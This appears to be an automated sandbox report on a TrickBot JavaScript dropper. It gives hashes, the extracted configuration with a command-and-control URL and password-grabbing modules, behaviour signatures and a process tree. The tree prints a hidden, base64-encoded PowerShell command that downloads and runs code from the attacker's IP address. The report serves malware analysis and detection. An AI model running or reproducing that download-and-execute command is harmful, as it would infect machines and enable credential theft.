Analysis
max time kernel: 123s
max time network: 125s
platform: windows7_x64
resource: win7v20210410
submitted: 20-07-2021 19:03
Static task: static1
Behavioral task: behavioral1
Sample: 4524.js
Resource: win7v20210410
General
Target: 4524.js
Size: 344KB
MD5: 1e15caad81dbf43c24c3517c6658c138
SHA1: 5a0e8e9cdc2a8b5a575c8f55674fa675ff49eef2
SHA256: 185ac740c3516c3a6461b15d9b94047d6b48c0bd2184a03087890b573ace2884
SHA512: dd094e3e20987d6951da8e7069bff408b09293a6c67077a77d6721b801754a2cf4bee895b67bac4a65d0a0f49a57be180b059f4334d9ecd825497c6d07da00fd
Malware Config
Extracted
http://109.248.201.26/lovemetertok.php
Extracted
trickbot
100018
rob109
autorun
  Name: pwgrabb
  Name: pwgrabc
Signatures
Blocklisted process makes network request (2 IoCs)
Processes:
  flow 6, pid 336, powershell.exe
  flow 7, pid 336, powershell.exe
Downloads MZ/PE file
Loads dropped DLL (1 IoC)
Processes:
  pid 616, rundll32.exe
Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow 12, ioc api.ipify.org
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes:
  pid 336, powershell.exe
  pid 336, powershell.exe
Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes:
  Token: SeDebugPrivilege, pid 336, powershell.exe
  Token: SeDebugPrivilege, pid 1168, wermgr.exe
Suspicious use of WriteProcessMemory (26 IoCs)
Processes (description, pid, process, target process; repeated events counted):
  PID 1240 wrote to memory of 1520: 1240 wscript.exe -> cmd.exe (3 events)
  PID 1520 wrote to memory of 336: 1520 cmd.exe -> powershell.exe (3 events)
  PID 336 wrote to memory of 588: 336 powershell.exe -> rundll32.exe (3 events)
  PID 588 wrote to memory of 616: 588 rundll32.exe -> rundll32.exe (7 events)
  PID 616 wrote to memory of 304: 616 rundll32.exe -> cmd.exe (4 events)
  PID 616 wrote to memory of 1168: 616 rundll32.exe -> wermgr.exe (6 events)
Processes (process tree, indented by depth)
C:\Windows\system32\wscript.exe
  Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\4524.js
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwADkALgAyADQAOAAuADIAMAAxAC4AMgA2AC8AbABvAHYAZQBtAGUAdABlAHIAdABvAGsALgBwAGgAcAAiACkA
    - Suspicious use of WriteProcessMemory
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwADkALgAyADQAOAAuADIAMAAxAC4AMgA2AC8AbABvAHYAZQBtAGUAdABlAHIAdABvAGsALgBwAGgAcAAiACkA
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\rundll32.exe
        Command line: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\iSePCFQ.bin StartW
        - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\rundll32.exe
          Command line: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\iSePCFQ.bin StartW
          - Loads dropped DLL
          - Suspicious use of WriteProcessMemory
          C:\Windows\SysWOW64\cmd.exe
            Command line: C:\Windows\system32\cmd.exe
          C:\Windows\system32\wermgr.exe
            Command line: C:\Windows\system32\wermgr.exe
            - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
C:\Users\Admin\AppData\Local\Temp\iSePCFQ.bin
  MD5: c081de0c60b825636e0eda6debce444e
  SHA1: a52284367553b80721088831bf6d7c128b2138df
  SHA256: 401e52fb29e17537735f4a4a53058c091957379b9e0d79855936dfbb62d12dcd
  SHA512: 876726a135ce5c5fa7dd1faa152ff737b0225f5f7c0ed17c70cb1b96a68074c4912eb49849c39bd8e3ee28e66fe746ced0398c2295b26db1f486882caca01a65